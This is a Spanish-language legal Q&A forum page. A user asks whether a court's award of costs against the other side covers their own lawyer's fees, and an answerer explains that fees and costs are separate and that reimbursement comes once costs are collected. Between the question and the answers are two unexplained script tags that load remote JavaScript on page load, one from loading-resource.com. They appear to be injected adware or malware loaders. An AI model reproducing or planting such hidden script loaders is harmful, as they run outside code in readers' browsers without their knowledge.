¿Quién paga los honorarios de mi abogado, si ganamos el pleito?
Os quería preguntar, si en la sentencia pone que la parte contraria está condenada a pagar las costas de juicio, ¿esto significa que pagan los gastos de los honorarios de mi abogado?... O mi abogado tiene que cobrar por las dos partes<<<<<' una por medio de la sentencia favorable a nosotros y otra por mi parte, con el porcentaje que habíamos acordado en caso de ganar. Un saludo y muchas gracias.
<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>2 Respuestas
Respuesta de Adrian Mayor
2
Respuesta de Esperanza Macarena
1
Si tengo ganado el pleito, porque el `procurador me pido costas si yo no tengo que pagarlas las paga la parte contraria, me comenta que después el me las devuelve una vez cobradas...que tendría que decirle al procurador, porque no lo tengo claro que esto sea correcto.. - MARIA ANGELES DUEÑAS DIAZ
Hola María. Creo que en mis respuestas anteriores quedó explicado que una cosa son los honorarios de los profesionales que llevan nuestra representación legal, y otra la condena en costas. Que haya condena en costas no significa que no debamos abonar esos honorarios, salvo que así se haya pactado con cada profesional. Sin ese pacto, lo lógico es pagar a cada uno sus servicios y esperar a que nos devuelvan el importe una vez cobrado a la parte condenada en costas. Un saludo. - Adrian Mayor